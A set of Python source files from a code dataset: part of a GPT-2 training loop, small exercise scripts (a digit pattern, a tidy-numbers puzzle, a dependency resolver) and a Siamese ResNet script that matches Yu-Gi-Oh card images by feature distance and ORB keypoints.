num_pieces=num_pieces,\n full_tokenizer=full_tokenizer,\n min_length=min_length\n )\n\n if not args.pretrained_model:\n model = transformers.modeling_gpt2.GPT2LMHeadModel(config=model_config)\n else:\n model = transformers.modeling_gpt2.GPT2LMHeadModel.from_pretrained(args.pretrained_model)\n model.train()\n model.to(device)\n\n num_parameters = 0\n parameters = model.parameters()\n for parameter in parameters:\n num_parameters += parameter.numel()\n print('Number of Parameters: {}'.format(num_parameters))\n\n multi_gpu = False\n full_len = 0\n print('Calculating Total Steps')\n for i in tqdm(range(num_pieces)):\n with open(tokenized_data_path + f'tokenized_train_{i}.txt', 'r') as f:\n full_len += len([int(item) for item in f.read().strip().split()])\n total_steps = int(full_len / stride * epochs / batch_size / gradient_accumulation)\n print('Total Steps: {total_steps}')\n\n optimizer = transformers.AdamW(model.parameters(), lr=lr, correct_bias=True)\n scheduler = transformers.WarmupLinearSchedule(\n optimizer, warmup_steps=warmup_steps, t_total=total_steps)\n\n if fp16:\n try:\n from apex import amp\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n model, optimizer = amp.initialize(model, optimizer, opt_level=fp16_opt_level)\n\n if torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n model = DataParallel(model, device_ids=[int(i) for i in args.device.split(',')])\n multi_gpu = True\n\n print('Training Begin')\n overall_step = 0\n running_loss = 0\n\n for epoch in range(epochs):\n now = get_time()\n print(f'Epoch {epoch + 1} - Time: {now}')\n x = np.linspace(0, num_pieces - 1, num_pieces, dtype=np.int32)\n random.shuffle(x)\n piece_num = 0\n for i in x:\n with open(tokenized_data_path + 'tokenized_train_{}.txt'.format(i), 'r') as f:\n line = f.read().strip()\n tokens = line.split()\n tokens = [int(token) for token in tokens]\n start_point = 0\n samples = []\n while start_point < len(tokens) - n_ctx:\n samples.append(tokens[start_point: start_point + n_ctx])\n start_point += stride\n if start_point < len(tokens):\n samples.append(tokens[len(tokens)-n_ctx:])\n random.shuffle(samples)\n # 捨棄最後一個不足一個完整 Batch 的 Step\n _steps = len(samples) // batch_size\n for step in range(_steps):\n # prepare data\n batch = samples[step * batch_size: (step + 1) * batch_size]\n batch_inputs = []\n for ids in batch:\n int_ids = [int(x) for x in ids]\n batch_inputs.append(int_ids)\n batch_inputs = torch.tensor(batch_inputs).long().to(device)\n\n # forward pass\n outputs = model.forward(input_ids=batch_inputs, labels=batch_inputs)\n loss, logits = outputs[:2]\n\n # get loss\n if multi_gpu:\n loss = loss.mean()\n if gradient_accumulation > 1:\n loss = loss / gradient_accumulation\n\n # loss backward\n if fp16:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), max_grad_norm)\n else:\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n\n # optimizer step\n if (overall_step + 1) % gradient_accumulation == 0:\n running_loss += loss.item()\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (overall_step + 1) % log_step == 0:\n tb_writer.add_scalar('loss', loss.item() * gradient_accumulation, overall_step)\n ts = datetime.utcnow() + timedelta(hours=8)\n ts = ts.strftime('%H:%M:%S')\n display_loss = running_loss * gradient_accumulation / (log_step / gradient_accumulation)\n print(\n f'Time {ts} - '\n f'Epoch {epoch + 1:{slen(epochs)}d}/{epochs} - '\n f'Step {step + 1:{slen(_steps)}d}/{_steps} - '\n f'Piece {piece_num + 1:{slen(num_pieces)}d}/{num_pieces} - '\n f'Loss {display_loss:.4f}'\n )\n running_loss = 0\n overall_step += 1\n piece_num += 1\n\n if (epoch + 1) % args.epoch_save == 0:\n print(f'Saving Model of Epoch {epoch + 1}')\n model_output_dir = os.path.join(output_dir, f'model_epoch{epoch + 1}')\n os.makedirs(model_output_dir, exist_ok=True)\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(model_output_dir)\n\n then = get_time()\n print(f'Epoch {epoch + 1} Finished - Time: {then}')\n delta = (then - now).total_seconds()\n mm, ss = delta // 60, delta % 60\n hh, mm = mm // 60, mm % 60\n print(f'Time Cost of the Epoch {epoch + 1} - {hh:.0f}:{mm:.0f}:{ss:.2f}')\n\n print('Training Done')\n model_output_dir = os.path.join(output_dir, 'final_model')\n os.makedirs(model_output_dir, exist_ok=True)\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(model_output_dir)\n\ndef slen(n):\n return len(str(n))\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614520656","text":"# print square pattern with digits in descending order \n# 3 2 1\n# 3 2 1\n# 3 2 1\nn = int(input(\"Enter no of rows \")) # 3 \nfor i in range(n):\n for j in range(n):\n print(n-j,end=\" \")\n print()\n ","sub_path":"square/ten.py","file_name":"ten.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590807357","text":"from sys import argv\n\n\ndef is_tidy(n):\n if n < 10:\n return True\n elif n % 10 == 0:\n return False\n\n digits = [int(d) for d in str(n)]\n\n k = 0\n\n for l in range(1, len(digits)):\n if digits[k] > digits[l]:\n return False\n k = l\n\n return True\n\n\ndef get_next_number(n):\n digits = [int(d) for d in str(n)]\n factor = 10 ** (len(digits)-1)\n\n if digits[0] == 9:\n return (9 * factor) - 1\n\n if digits[-1] == 0:\n # 11110\n if len(set(digits)) == 2 and digits[1] == 1:\n return factor - 1\n return n - 1\n else:\n for k, m in enumerate(digits):\n if m > digits[k+1]:\n # change k+1 to 0\n idx = k+1\n while idx < len(digits):\n digits[idx] = 0\n idx = idx + 1\n break\n n = int(''.join(map(str, digits)))\n\n return n\n\n\nif __name__ == '__main__':\n test_cases = open(argv[1])\n\n t = int(test_cases.readline())\n last_tidy = 1\n\n for i in range(1, t+1):\n n = int(test_cases.readline())\n current = n\n\n while True:\n if is_tidy(current):\n print(f\"Case #{i}: {current}\")\n break\n\n current = get_next_number(current)\n\n test_cases.close()\n","sub_path":"solutions_python/Problem_200/3349.py","file_name":"3349.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423042109","text":"def depend(dicto):\n a=[]\n b=len(dicto)\n print(b)\n while len(a)!=b:\n fl=0\n for x in dicto.copy():\n if len(dicto.get(x))==0:\n a.append(x)\n del dicto[x]\n else:\n for y in dicto.get(x):\n if y in a:\n fl=fl+1\n if fl==len(dicto.get(x)):\n a.append(x)\n del dicto[x]\n print(a)\n \npack=int(input(\"enter the no of packages to be installed\"))\nd={}\nfor i in range(pack):\n pa=input(\"enter the package name\")\n de=int(input(\"enter the no of dependecy\"))\n x=[]\n for j in range(de):\n dee=input(\"enter the name of the dependency\")\n x.append(dee)\n d[pa]=x \n \ndepend(d) \n","sub_path":"depend.py","file_name":"depend.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"339419790","text":"# -*- coding: utf-8 -*-\n\nimport torchvision\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader,Dataset\nimport matplotlib.pyplot as plt\nimport torchvision.utils\nimport numpy as np\nimport random\nfrom PIL import Image\nimport torch\nfrom torch.autograd import Variable\nimport PIL.ImageOps \nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport cv2\nfrom matplotlib import pyplot as plt\nimport os\n#from torchsummary import summary\nimport models_lpf.resnet as mod_res\n\n\nfrom time import time\nimport random\nimport torchvision.models as models\nimport pickle\n\n\nuseGPU = True\n\ntargetDirName = '../cardDatabaseFull/'\nassert os.path.exists(targetDirName)\n\n#loadPath = 'resShiftEasy-resnet101-e300-b24.pth'\n#dictPath = 'featureMap-resShiftEasy-res101-e300-b24.pkl'\n\n#loadPath = './res-dropout-early.pth'\n#dictPath = 'featureMap-combined.pkl'\n\n#loadPath = 'finalModel/resShiftEasy-resnet101-e300-b24.pth'\n#dictPath = 'finalModel/featureMap-resShiftEasy-res101-e300-b24-eval.pkl'\n\nloadPath = 'savedModels/res-withShift-150-072020.pth'\ndictPath = 'savedModels/featureMap-withShift-150-072020.pkl'\n\n\n#dictPath = 'featureMap-res-resShiftI-e300-b24.pkl'\n#dictPath = 'featureMap-5.pkl'\n#dictPath = 'featureMap-resL-resnet101-e245-b24-lte.pkl'\n\nassert os.path.exists(dictPath)\nassert os.path.exists(loadPath)\n\n\nviewNCards = 3\nsiftNLim = 10\nHOGRankingEnable = True\nextremeSIFT = False\n\ndim=(255,255)\n\n\nvisualizeResult = True\n'''\n# Problem cards\ntdm_0.png\ntdms_2.png\n\ntw_0.png\n\n/dark-magician/1.jpg\nshifted-dm_0.png\n\nbewd_dd.png\n'''\n\n'''\n# Card Crush Virus\ngroundTruthPath = targetDirName + 'Crush-Card-Virus-1-57728570/57728570.jpg'\nimagePath0 = './test-input/ccv_0.png'\n'''\n\n\n# Toon Dark Magician (tdm_0.png fails) (original rank of 1032) (HOG rank of 118)\ngroundTruthPath = targetDirName + 'Toon-Dark-Magician-0-21296502/21296502.jpg'\nimagePath0 = './test-input/tdm_0.png'\n#imagePath0 = './test-input/tdms_2.png'\n\n\n'''\n# Time Wizard \ngroundTruthPath = targetDirName + 'Time-Wizard-0-716252220/716252220.jpg'\nimagePath0 = './test-input/tw_0.png'\n'''\n\n'''\n# Dark Magician (still problems with sifted-dm_0.png)\n#imagePath0 = './test-input/dm_0.png'\ngroundTruthPath = targetDirName + 'Dark-Magician-0-46986414/469864140.jpg'\nimagePath0 = './data/cards/training/dark-magician/1.jpg'\n#imagePath0 = './test-input/sifted-dm_0.png'\n'''\n'''\n#imagePath0 = './test-input/bewd_0.png'\ngroundTruthPath = targetDirName + 'BlueEyes-White-Dragon-1-89631139/896311391.jpg'\nimagePath0 = './test-input/bewd_dd.png'\n'''\nassert os.path.exists(imagePath0)\n\n\ncardName = imagePath0.split('/')[2]\n\n\n\n\n\n\n\n\"\"\"## Helper functions\nSet of helper functions\n\"\"\"\n\ndef imshow(img,text=None,should_save=False):\n npimg = img.numpy()\n plt.axis(\"off\")\n if text:\n plt.text(75, 8, text, style='italic',fontweight='bold',\n bbox={'facecolor':'white', 'alpha':0.8, 'pad':10})\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show() \n\ndef show_plot(iteration,loss):\n plt.plot(iteration,loss)\n plt.show()\n\n\"\"\"## Configuration Class\nA simple class to manage configuration\n\"\"\"\n\nclass Config():\n #training_dir = \"./data/cards_old/training/\"\n #testing_dir = \"./data/cards_old/testing/\"\n \n #training_dir = \"./data/cards/training/\"\n #testing_dir = \"./data/cards/testing/\"\n \n training_dir = \"../cardDatabase/\"\n testing_dir = \"../cardDatabase/\"\n \n \n #training_dir = \"./cardDatabaseFull/\"\n #testing_dir = \"./cardDatabaseFull/\"\n \n #testing_dir = \"./data/cards_old/testing/\"\n \n #train_batch_size = 24\n train_batch_size = 24*2\n\n #train_batch_size = 8\n train_number_epochs = 300\n\n\"\"\"## Custom Dataset Class\nThis dataset generates a pair of images. 0 for geniune pair and 1 for imposter pair\n\"\"\"\n\nclass SiameseNetworkDataset(Dataset):\n \n def __init__(self,imageFolderDataset,transform=None,should_invert=True):\n self.imageFolderDataset = imageFolderDataset \n self.transform = transform\n self.should_invert = should_invert\n\n def __getitem__(self,index):\n\n # Get an image\n img0_tuple = random.choice(self.imageFolderDataset.imgs)\n\n # Get an image from the same class\n while True:\n #keep looping till the same class image is found\n img1_tuple = random.choice(self.imageFolderDataset.imgs) \n if img0_tuple[1]==img1_tuple[1]:\n break\n\n # Get an image from a different class\n while True:\n #keep looping till a different class image is found\n \n img2_tuple = random.choice(self.imageFolderDataset.imgs) \n if img0_tuple[1] !=img2_tuple[1]:\n break\n\n #width,height = (100,150)\n width,height = (244,244)\n\n pathList = []\n pathList.append((img0_tuple[0],img1_tuple[0],img2_tuple[0]))\n\n img0 = Image.open(img0_tuple[0]).resize((width,height))\n img1 = Image.open(img1_tuple[0]).resize((width,height))\n img2 = Image.open(img2_tuple[0]).resize((width,height))\n \n \n # Crop the card art\n #img0 = img0[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n #img1 = img1[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n img0 = img0.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n img1 = img1.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n img2 = img2.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n \n \n img0 = img0.convert(\"L\")\n img1 = img1.convert(\"L\")\n img2 = img2.convert(\"L\")\n \n if self.should_invert:\n img0 = PIL.ImageOps.invert(img0)\n img1 = PIL.ImageOps.invert(img1)\n img2 = PIL.ImageOps.invert(img2)\n\n if self.transform is not None:\n img0 = self.transform(img0)\n img1 = self.transform(img1)\n img2 = self.transform(img2)\n \n #return img0, img1 , torch.from_numpy(np.array([int(img1_tuple[1]!=img0_tuple[1])],dtype=np.float32))\n\n # anchor, positive image, negative image\n return img0, img1 , img2, pathList\n\n def __len__(self):\n return len(self.imageFolderDataset.imgs)\n\n\"\"\"## Using Image Folder Dataset\"\"\"\n\nfolder_dataset = dset.ImageFolder(root=Config.training_dir)\n\n# Commented out IPython magic to ensure Python compatibility.\nclass ImgAugTransform:\n def __init__(self):\n self.aug = iaa.Sequential([\n #iaa.Scale((224, 224)),\n iaa.Sometimes(0.25, iaa.GaussianBlur(sigma=(0, 3.0))),\n #iaa.Affine(rotate=(-20, 20), mode='symmetric'),\n iaa.Sometimes(0.25,\n iaa.OneOf([iaa.Dropout(p=(0, 0.1)),\n iaa.CoarseDropout(0.1, size_percent=0.5)])),\n iaa.AddToHueAndSaturation(value=(-10, 10), per_channel=True)\n ])\n\n def __call__(self, img):\n img = np.array(img)\n return self.aug.augment_image(img)\n\n# https://colab.research.google.com/drive/109vu3F1LTzD1gdVV6cho9fKGx7lzbFll#scrollTo=aUpukiy8sBKx\nsiamese_dataset = SiameseNetworkDataset(imageFolderDataset=folder_dataset,\n transform=transforms.Compose([\n transforms.Grayscale(num_output_channels=3),\n #transforms.Resize((100,100)),\n transforms.Resize((244,244)),\n transforms.ColorJitter(brightness=(0.2,1.5),contrast=(0.1,2.5),hue=.05, saturation=(.0,.15)),\n #transforms.RandomHorizontalFlip(),\n #transforms.RandomRotation(10),\n \n transforms.RandomAffine(0, translate=(0.0,0.0), scale=None, shear=(0.0,0.0), resample=PIL.Image.NEAREST, fillcolor=(0,0,0)),\n transforms.ToTensor()\n #transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])\n ]),should_invert=False)\n\n\n\nvis_dataloader = DataLoader(siamese_dataset,\n shuffle=True,\n num_workers=8,\n #num_workers=0,\n batch_size=8)\ndataiter = iter(vis_dataloader)\n\n\n \nclass SiameseNetwork(nn.Module):\n def __init__(self):\n super(SiameseNetwork, self).__init__()\n\n\n #self.resnet = models.resnet101(pretrained=True)\n #self.resnet = models_lpf.resnet.resnet101(filter_size=3, pretrained=True)\n #self.resnet = mod_res.resnet101(filter_size=1, pretrained=True)\n self.resnet = mod_res.resnet101(filter_size=3)\n\n '''\n if useGPU:\n self.resnet.load_state_dict(torch.load('./pretrainedWeights/resnet101_lpf3.pth.tar')['state_dict'])\n else:\n device = torch.device('cpu')\n self.resnet.load_state_dict(torch.load('./pretrainedWeights/resnet101_lpf3.pth.tar', map_location=device)['state_dict'])\n '''\n #self.resnet = torch.nn.Sequential(*(list(self.resnet.children())[:-1]))\n\n def forward_once(self, x):\n '''\n output = self.cnn1(x)\n output = output.view(output.size()[0], -1)\n output = self.fc1(output)\n #print(output.shape)\n #print(output)\n '''\n #begin = time()\n output = self.resnet(x)\n #print('Time for forward prop: ', time()-begin)\n\n return output\n \n\n def forward(self, input1, input2, input3):\n output1 = self.forward_once(input1)\n output2 = self.forward_once(input2)\n output3 = self.forward_once(input3)\n\n return output1, output2, output3\n\n\"\"\"## Contrastive Loss / Triplet Loss\"\"\"\n\n\n\nclass ContrastiveLoss(torch.nn.Module):\n \"\"\"\n Contrastive loss function.\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n \"\"\"\n\n def __init__(self, margin=2.0):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n\n def forward(self, output1, output2, label):\n #begin = time()\n euclidean_distance = F.pairwise_distance(output1, output2, keepdim = True)\n loss_contrastive = torch.mean((1-label) * torch.pow(euclidean_distance, 2) +\n (label) * torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0), 2))\n\n #print('Time for contrastive Loss: ', time()-begin)\n return loss_contrastive\n\n\nclass TripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin):\n super(TripletLoss, self).__init__()\n self.margin = margin\n\n def forward(self, anchor, positive, negative, size_average=True):\n #begin = time()\n distance_positive = (anchor - positive).pow(2).sum(1) # .pow(.5)\n distance_negative = (anchor - negative).pow(2).sum(1) # .pow(.5)\n losses = F.relu(distance_positive - distance_negative + self.margin)\n\n #print('Time for triplet loss: ', time()-begin)\n\n return losses.mean() if size_average else losses.sum()\n\n\"\"\"## Training Time!\"\"\"\nprint('Loading train dataloader. . .')\ntrain_dataloader = DataLoader(siamese_dataset,\n shuffle=True,\n num_workers=0,\n batch_size=Config.train_batch_size)\n\n\n\n\n#net = SiameseNetwork_old().cuda()\n#net = SiameseNetwork_old()\n#net = SiameseNetwork().cuda()\n\nif useGPU:\n net = SiameseNetwork().cuda()\n margin = 2.\n criterion = TripletLoss(margin)\n\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n #net = nn.DataParallel(net,device_ids=[0,1,2,3])\n net = nn.DataParallel(net,device_ids=[0])\n net.load_state_dict(torch.load(loadPath))\nelse:\n device = torch.device('cpu')\n net = SiameseNetwork().to(device)\n margin = 2.\n criterion = TripletLoss(margin)\n\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n #net = nn.DataParallel(net, device_ids=None).to(device)\n \n \n state_dict = torch.load(loadPath,map_location=device)\n \n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k,v in state_dict.items():\n #name = k\n name = k[7:] # remove `module.`\n #name = 'module.'+k\n #print(name)\n new_state_dict[name] = v\n # load params\n\n net.load_state_dict(new_state_dict)\n net = net.to(device)\n\n#net.eval()\n\nprint('Model parallelized')\n\n\nprint('\\n\\n\\n\\n\\n Loaded model')\n\n\n\n#net = SiameseNetwork(Bottleneck, [3,4,23,3])\n#criterion = ContrastiveLoss()\n\n\n\n\n\n\ndef expand_img_dim(img,numOfExp):\n for i in range(0,numOfExp):\n img = np.expand_dims(img,axis=0)\n return img\n\ndef imgArtCropper(img):\n \n if type(img) is np.ndarray:\n width,height = img.shape\n img = img[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n else:\n width, height = img.size\n img = img.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n \n return img\n\ndef imgPathToCVImg(absPath):\n img = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return img\n\ndef imgPathToTranslateCVImg(absPath,translation_matrix):\n img = cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA)\n img = cv2.warpAffine(img, translation_matrix, (img1.shape[0],img1.shape[1]))\n img = imgArtCropper(img)/255.0\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return img\n\ndef imgPathToNormalizedTranslateCVImg(absPath,translation_matrix):\n img = cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA)\n img = cv2.warpAffine(img, translation_matrix, (img.shape[0],img.shape[1]))\n img = imgArtCropper(img)\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n img = cv2.equalizeHist(img)\n return img\n\n\ndef imgPathToNormalizedCVImg(absPath):\n img0 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n\n img0 = cv2.equalizeHist(img0)\n return img0\n\ndef cvImgToTensor(img):\n if img.ndim < 3:\n img = [img] * 3\n img = expand_img_dim(img,1)\n elif img.ndim != 3:\n print(\"The dimensions of the image is neither 1 nor 3, this should not happen (cvImgToTensor)\")\n return None\n img = torch.from_numpy(img).type('torch.FloatTensor')\n return img\n\ndef imgPathToTensor(absPath):\n img1 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n img1 = [img1] * 3\n img1 = expand_img_dim(img1,1)\n img1 = torch.from_numpy(img1).type('torch.FloatTensor')\n\n return img1\n\ndef imgPathToNormalizedTensor(absPath):\n img0 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n\n img0 = cv2.equalizeHist(img0)\n\n img0 = [img0] * 3\n img0 = expand_img_dim(img0,1)\n img0 = torch.from_numpy(img0).type('torch.FloatTensor')\n return img0\n\n\n\n\ndef getSimilarRank(imagePath0,imagePath1):\n # Load image 0\n img0 = imgArtCropper(cv2.resize(cv2.imread(imagePath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n img0 = [img0] * 3\n img0 = expand_img_dim(img0,1)\n img0 = torch.from_numpy(img0).type('torch.FloatTensor')\n\n # Load image 1\n img1 = imgArtCropper(cv2.resize(cv2.imread(imagePath1,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n img1 = [img1] * 3\n img1 = expand_img_dim(img1,1)\n img1 = torch.from_numpy(img1).type('torch.FloatTensor')\n\n # Compare and get similary rank\n concatenated = torch.cat((img0,img1),0)\n if useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img1).cuda(),Variable(img1).cuda())\n else:\n output1,output2,_ = net(Variable(img0),Variable(img1),Variable(img1))\n #begin = time()\n euclidean_distance = F.pairwise_distance(output1, output2)\n #print('Time to compare euclidean distance: ', time()-begin,'s')\n return euclidean_distance, (output1,output2)\n\ndef compareNCards(imgPath0,imgPath1,targetDirName,n_compare=10):\n # Declarations\n rankList = []\n featureMapList = []\n\n # N-way one shot learning evaluation\n # Compare positive images\n euclidean_distance,featureMap = getSimilarRank(imagePath0,imagePath1)\n output1 = featureMap[0]\n\n rankList.append((imagePath1.split('/')[-2],euclidean_distance.item(),imagePath1))\n featureMapList.append(output1)\n\n\n # Retrieve N negative images\n cardList = os.listdir(targetDirName)\n random.shuffle(cardList)\n cardList = cardList[:n_compare]\n negList = []\n for folderCard in cardList:\n cardDir = targetDirName + folderCard + '/'\n imgTar = os.listdir(cardDir)[0]\n imgPath = cardDir + imgTar\n negList.append(imgPath)\n\n #print(negList)\n\n\n # Compare ranks\n # Similar\n '''\n concatenated = torch.cat((img0,img1),0)\n #output1,output2,_ = net(Variable(img0),Variable(img1),Variable(img1))\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img1).cuda(),Variable(img1).cuda())\n euclidean_distance = F.pairwise_distance(output1, output2)\n '''\n\n # Different\n for filePath in negList:\n trueFilePath = filePath \n euclidean_distance,featureMap = getSimilarRank(imagePath0,trueFilePath)\n output1 = featureMap[0]\n\n rankList.append((trueFilePath.split('/')[-2],euclidean_distance.item(),trueFilePath))\n #featureMapList.append(output1)\n\n rankList.sort(key = lambda x: x[1])\n return rankList, featureMapList\n\n\n\n\n\n#####\n# We check for model / dictionary mismatch\n#####\nfeatureMapDict = pickle.load(open(dictPath, 'rb'))\nprint(dictPath)\nprint(loadPath)\n\n\n# We do some unit tests to see if model matches dictionary activation maps\ntmpPath0 = targetDirName+'Union-Attack-0-60399954/603999540.jpg'\n\nassert os.path.exists(targetDirName)\nassert os.path.exists(tmpPath0)\n\n\n\nimg0 = imgArtCropper(cv2.resize(cv2.imread(tmpPath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\nimg0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\nimg0 = [img0] * 3\nimg0 = expand_img_dim(img0,1)\nimg0 = torch.from_numpy(img0).type('torch.FloatTensor')\n\nif useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img0).cuda(),Variable(img0).cuda())\nelse:\n output1,output2,output3 = net(Variable(img0),Variable(img0),Variable(img0))\n\ncardNameTemp = tmpPath0.split('/')[-2]\nname,output2 = featureMapDict[cardNameTemp]\nprint(cardNameTemp)\n\nif useGPU:\n euclidean_distance = F.pairwise_distance(output1, output2)\nelse:\n euclidean_distance = F.pairwise_distance(output1, output2.detach().cpu())\n\nprint(euclidean_distance.item())\n\n\nassert euclidean_distance.item() < 0.001\nprint('No model / dictionary mismatch')\n\n\n\n\n\n\n\n\n\n\n\n\ndef calculateSIFTscore(similarScore, numOfPts):\n if extremeSIFT:\n return similarScore-(numOfPts**3)/10000000\n return similarScore-(numOfPts**2)/100000\n\ndef calculateHOGpoints(orb,img1,img2):\n kpts1, descs1 = orb.detectAndCompute(img1,None)\n kpts2, descs2 = orb.detectAndCompute(img2,None)\n\n if descs2 is None:\n return 0\n\n #print(len(descs2))\n\n ## match descriptors and sort them in the order of their distance\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = bf.match(descs1, descs2)\n dmatches = sorted(matches, key = lambda x:x.distance)\n\n numOfMatches = len(matches)\n\n return numOfMatches\n\norb = cv2.ORB_create()\n\n\n\n\n# Faster way to predict by using dictionary\n# We calculate the output of all images in the dataset ahead of time and store them in a dictionary\n# We iterate through that and calulate distance score\n# This means checking each input's simularity rank takes under 2 seconds to run\n\n# Will consider on using a min heap to make this faster\n\n\n\nrankList = []\n\nbegin = time()\n\n\nimg0Display = imgPathToTensor(imagePath0) # For display purposes\nimg0 = imgPathToNormalizedTensor(imagePath0)\n\n\n#siftImg0 = imgArtCropper(cv2.resize(cv2.imread(imagePath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\nsiftImg0 = imgArtCropper(cv2.imread(imagePath0,0))\nsiftImg0 = cv2.resize(siftImg0, dim, interpolation = cv2.INTER_AREA)\n\n\n\n\n\n\n\n\n# Get the activation map of the test image\nif useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img0).cuda(),Variable(img0).cuda())\nelse:\n output1,output2,output3 = net(Variable(img0),Variable(img0),Variable(img0))\n#output1 = net.forward_once(img0)\n\nprint('Single image prediction phase: ',time()-begin,'s')\nbegin = time()\n\n# Iterating through all activation maps\nfor key,value in featureMapDict.items():\n \n absPath,output2 = value\n if useGPU:\n euclidean_distance = F.pairwise_distance(output1, output2)\n else:\n euclidean_distance = F.pairwise_distance(output1, output2.detach().cpu())\n\n #rankList.append((trueFilePath.split('/')[-2],euclidean_distance.item(),trueFilePath))\n rankList.append((key,euclidean_distance.item(),absPath,None))\n\n\n\n\nrankList.sort(key = lambda x: x[1])\n\n\n# Now we just get results\nprint('\\n\\n\\n\\n\\n')\ni = 0\n#for name,score,absPath in rankList:\n\n# Now we calculate for HOG points\n\n\nrankListFinal = []\nfor name,score,absPath,_ in rankList[:siftNLim]:\n #img1 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = imgArtCropper(cv2.imread(absPath,0))\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n\n numPoints = calculateHOGpoints(orb,siftImg0,img1)\n finalScore = calculateSIFTscore(score, numPoints)\n rankListFinal.append((name,finalScore,absPath,numPoints,score))\n\n \nif HOGRankingEnable:\n rankListFinal.sort(key = lambda x: x[1])\nelse:\n rankListFinal.sort(key = lambda x: x[4])\n\n \nprint('Dictionary manage',time()-begin,'s')\n\n\nrankStr = None\nguessedCorrectlyRankOne = False\n\nrankIter = 0\nincorrectList = []\npred = []\n\nfor name,score,absPath,numHOGPoints,originalScore in rankListFinal:\n \n rankStr = ': rankOriginal:'\n if HOGRankingEnable:\n rankStr = ': rank:'\n\n\n #print(name,': ', score)\n incorrectList.append(name)\n \n print(cardName, ' ', absPath.split('/')[2])\n # We matched with the correct monster\n if absPath.split('/')[2] == cardName:\n if(rankIter == 0):\n print('\\n\\nCorrect\\n\\n')\n pred = np.append(pred,1)\n guessedCorrectlyRankOne = True\n\n img1 = imgPathToTensor(absPath)\n\n if visualizeResult:\n concatenated = torch.cat((img0Display,img1),0)\n\n print('______________________________________________________________________________________________________')\n print('\\n\\n\\n')\n \n rankStr = ' ' + name + rankStr + str(i) + ' (out of '+str(len(rankList))+') score:'+str(score) + ' numORBpts:' + str(numHOGPoints)+' originalScore: ' + str(originalScore)\n print(' ',imagePath0)\n print(rankStr)\n print('\\n\\n')\n print('______________________________________________________________________________________________________')\n elif i < viewNCards:\n img1 = imgPathToTensor(absPath)\n concatenated = torch.cat((img0Display,img1),0)\n\n if visualizeResult:\n #if visualizeResult or not guessedCorrectlyRankOne:\n \n print(name,': ',rankStr,i,' score:',score, ' numORBpts:', str(numHOGPoints),' originalScore: ', str(originalScore))\n 